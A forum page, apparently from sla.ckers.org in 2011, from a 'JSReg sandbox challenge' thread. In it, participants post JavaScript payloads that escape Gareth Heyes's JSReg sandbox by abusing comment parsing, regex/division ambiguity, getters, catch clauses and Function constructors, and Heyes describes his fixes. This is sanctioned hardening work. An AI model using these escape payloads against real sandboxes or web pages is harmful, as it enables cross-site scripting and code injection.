Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...345678910111213Next
Current Page: 10 of 13
Re: JSReg sandbox challenge
Date: July 27, 2011 11:00AM

When was the last time you had an issue with the comment parsing?

alert-->0/*
(window[),('location'])/**/

The --> is only a comment IF there is a <!-- present before it.

Similarly for IE (using IE8, not sure about other versions):

alert<!--0[0]/*-->
(window[),('location'])/**/

Generator bugs:

[_ for(_ in 0)]
[/0/
for(_ in 0)]
[true for(_ in 0)]
[0 for(_ in 0)if(0)]
[[] for(_ in 0)]
[0 for($ in 0)for(_ in 0)]

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)



Edited 3 time(s). Last edit at 07/27/2011 11:54AM by Jonas Magazinius.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 27, 2011 12:14PM

@Jonas

The reason is that the comments aren't removed when looking forward so any checks forwards will fail when the comments are removed putting JSReg in a different state than the browser how you and lever one cleverly highlighted :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Date: July 27, 2011 12:37PM

Some problems with getters and setters:

+{get _()/'/+alert(window.location)}.$_$//'
({set _(_)/'/+alert(window.location)}).$_$=0//'

EDIT:

Another way to do the same thing:
({get _()/ /*/*/0/+alert(window[),('location'])})._//*/0})

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)



Edited 1 time(s). Last edit at 07/27/2011 12:53PM by Jonas Magazinius.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 27, 2011 01:45PM

Ok here's the deal, I dropped get/set because there is no logic to handle curlyless get/set statements. I've fixed the escapes by emulating Webkit/Opera/FF behaviour, this treats <!-- as a comment regardless if it's valid syntax :(
Chrome/FF/Opera/Safari: 1<!--window === 1 IE:1<!--window === false

The generator ones can't be fixed without detecting generators and knowing the context since the automatic semi colon insertion would fail for the following stuff:-

a=123;
a
for(var i=0;i<10;i++)1+1

I may add get/set in future and when I've worked out generator context I may add complete support too

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 27, 2011 03:08PM

@Gareth
To emulate non-IE bahavior (btw, behaviors of GC/FF/Opera are also different) JSReg should be deleted all after "<!--". At current time, "-->" breaks the deleting.

1/<!--i-->/0/+
{x:1,
lo:{}/'/,alert(parent.location)//'}

----------------------
~Veritas~

Options: ReplyQuote
Re: JSReg sandbox challenge
Date: July 27, 2011 03:13PM

I'm on a roll today..

this['__proto__']=window;
alert(this['location'])

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 27, 2011 07:42PM

Me === embarrassed I forgot this again =)
NiceWork++;

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 27, 2011 07:57PM

In addition, the last fix has opened the possibility to exploit of the old mistakes.

1</**/!--i+
{x:1,
lo:{}/'/,alert(parent.location)//'}

----------------------
~Veritas~

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 28, 2011 07:04AM

Thanks very much for this awesome work!
Should be fixed now, the <!-- comment parser was out by one =) it didn't move the position at the end of the comment. I added "this" to the left check and put back the inline comment check in the output.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Date: July 28, 2011 09:35AM

My latest bypass uses some JavaScript magic that I didn't even know about until today:

try{throw window}catch(x/**/ if(x)['location']='javascript:alert(window.location)'){}

Evaluating expressions inside the catch-variable definition.. Oh, and this is probably FF specific.

And btw, here's a way to make array comprehensions work again:
[_/**/ for(_ in[])]

And for..in loops are broken:
for([]in[]);
for({}in{});

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)



Edited 4 time(s). Last edit at 07/28/2011 10:48AM by Jonas Magazinius.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 28, 2011 10:41AM

My mental js parser just went WTF there's a jonas in here.
That's crazy.

Quote

[_/**/ for(_ in[])]

Haha nice hack

Quote

And for..in loops are broken:
for([]in[]);
for({}in{});

Yeah it requires some tweaking, I'm probably going to identify when you are inside a for in statement

THIS IS CRAZY LOL WTF AM I SUPPOSED TO DO
try{throw window}catch(xyz if(alert(xyz.location))){}

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 07/28/2011 10:56AM by Gareth Heyes.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 28, 2011 12:28PM

1/{'$lo$function':function(){return function()0}}.lo//
function()['constructor']('alert(parent.location)')()

----------------------
~Veritas~

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 28, 2011 12:46PM

Your exploits just keep getting better :D I'll try and keep up with you...

* Fixed vector
* Added strict mode
* Assigned this to window

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 07/28/2011 12:55PM by Gareth Heyes.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 28, 2011 01:21PM

0?1:{'$lo$function':function(){return function()0}}.lo//
function()['constructor']('alert(parent.location)')()

Fix should be more radical. There are many more such bugs.

----------------------
~Veritas~



Edited 1 time(s). Last edit at 07/28/2011 01:30PM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 28, 2011 02:01PM

@lever_one

Yeah, I've enforced a semi-colon before a detected block statement. This will not allow block statement with labels but how useful are those anyway? Thanks!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 28, 2011 03:25PM

Artificial insertion (in this case ";") can be used for difference between the obj. literal and block:
insertion --> check syntax -->
A) if syntax error --> this is a obj. literal
B) if still valid syntax --> this is a block

The result is returned without the artificial insertion.
The advantage is not to modify the code structure.

----------------------
~Veritas~

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 28, 2011 06:36PM

Awesome suggestion, I thought it might be a performance hit. We'll see how it goes, I've added for every automatic semi-colon insertion too just the object literal/block statement now

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 07/28/2011 06:52PM by Gareth Heyes.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 28, 2011 09:16PM

Now JSReg behaves correctly in some situations.

i+++
{}/i/i

for(;{}/i/i;)break; // for(;function(){}/i/i;)break; <-- still incorrect // The artificial insertion can be used also to check if this is a function or func. expression (whether there is reference to the function).

new old bug:

function lo()/**/{}/'/,alert(parent.location)//'

----------------------
~Veritas~



Edited 1 time(s). Last edit at 07/29/2011 06:50PM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 29, 2011 08:35AM

@Lever_One

Won't that check fail for stuff like:-

if(1) {
function x() {
};<-- syntax error because if statement is not closed
}

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 29, 2011 09:31AM

@Gareth

1. Insertion should be done always before the "function" (if it comes to the function or f. expression) or before the opening bracket "{" (if it is about a block or object).
2. To check the syntax when you insert has to be taken all the code and not part of it. Is it possible?

For example:

1.
if(1) {
;function x() { // <-- valid syntax ==> there is no reference to the function ==> /i/i will be treated as regexp
}/i/i
}

2.
x=(12,[],;function(){}/i/i,[]) // <-- syntax error ==> /i/i will be treated as division

3.

0?;function(){}:0 // <-- syntax error

4.

for(;;function(){};)break; // <-- syntax error

5.

switch (1) {case 1 : ;function x(){}} // <-- valid syntax

6.

if(0);function x(){} // <-- FAIL!!
else {}

7. (function();function(){})() // <-- FAIL :(

Perhaps in such cases need to go back to the required brackets after "if", "else", "function".

----------------------
~Veritas~



Edited 7 time(s). Last edit at 08/01/2011 02:57PM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: August 01, 2011 11:51AM

Sorry for the delay, I took some time to think about this. I've decided to enforce functions by using a semi-colon at the beginning and the end.

So for example :-
function x(){}

becomes:-
;function x(){};

Function expressions are modified with parens

so:
1,function x(){}

becomes:
1,(function x(){})

Which should enforce expressions without breaking anything. This way the syntax will break but should not result in a sandbox escape. I can then fix the syntax errors once the vector has been eliminated.

Syntax checking is hard and although it was a really nice idea I'm not sure it will be possible since it would require me to backtrack the code or look forward and parse multiple times. Patterns such as:-
(function(){

})();

Will always result in a syntax error unless the whole code is checked each time, I could store various locations where I placed a semi-colon and remove them before the final eval but it would be too slow IMO.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 08/01/2011 11:52AM by Gareth Heyes.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: August 01, 2011 02:28PM

eval//
function x(){}/alert(window[),('location'])//lo

btw, one IE-vector by Jonas still alive...

----------------------
~Veritas~



Edited 2 time(s). Last edit at 08/01/2011 02:31PM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: August 01, 2011 05:56PM

Quote

eval//
function x(){}/alert(window[),('location'])//lo

Hahah pretty damn awesome. Clever

Quote

btw, one IE-vector by Jonas still alive...

Thanks I ran a test but must have missed IE

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: August 02, 2011 11:10AM

I've removed the old comment handling and modified the newer one to accept /**/ and //, comment processing now comes before rewriting. I did a check on old bugs and it seems to be good

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: August 02, 2011 10:46PM

//Safari 5.0.5 Win (and older versions of other browsers, which are considered a regexp as a function.)

/x/
function lo(){}/alert(window[),('location'])/1

----------------------
~Veritas~



Edited 2 time(s). Last edit at 08/03/2011 09:34AM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: August 03, 2011 06:27AM

@LeverOne

Nice! I couldn't see the bug myself as the latest version of Safari doesn't seem to allow it. But I fixed it by inserting a semi-colon after a regex if a function follows. I've also improved the eos insertion and spaces insertion to be slightly more clever how they're inserted. Thanks! I keep hoping after every fix you won't be able to break it yet you still do :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: August 03, 2011 05:40PM

[[]][0]
++
{x:{}/lo//alert(window[),('location'])
}['x']

----------------------
~Veritas~

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: August 04, 2011 06:23AM

Whoa that one was amazing, I didn't know how to fix it but since the eos insertion was working and this relies on the browser state being different than the jsreg state, so I thought when the comments are stripped force a space after the detected regex if a "/" is detected after so that there is no confusion between the two.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: August 04, 2011 11:34AM

[[]][0]
++
{lo:{}/i/ /alert(window[),('location'])/i}['lo']


[[]][0]
++
{lo:{}/'/+alert(window[),("location"])+/'/i}['lo']


[[]][0]
++
{lo:{}/i/*alert(window[),('location'])*/-i/i}['lo']

----------------------
~Veritas~



Edited 2 time(s). Last edit at 08/04/2011 12:44PM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: August 04, 2011 01:12PM

Man, so I close up hiding it in a comment and then you hide it in a regex lol you're good. I track the starting square position, then when the ending square occurs I gather the contents of the object accessor and see if the syntax is valid. If the syntax isn't valid then an attack is occurring since you've managed to inject a uneven ")". If you can somehow inject a valid syntax looking object accessor but still break out of the paren then you'll break it again.

:O awesome work

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Pages: PreviousFirst...345678910111213Next
Current Page: 10 of 13


Sorry, only registered users may post in this forum.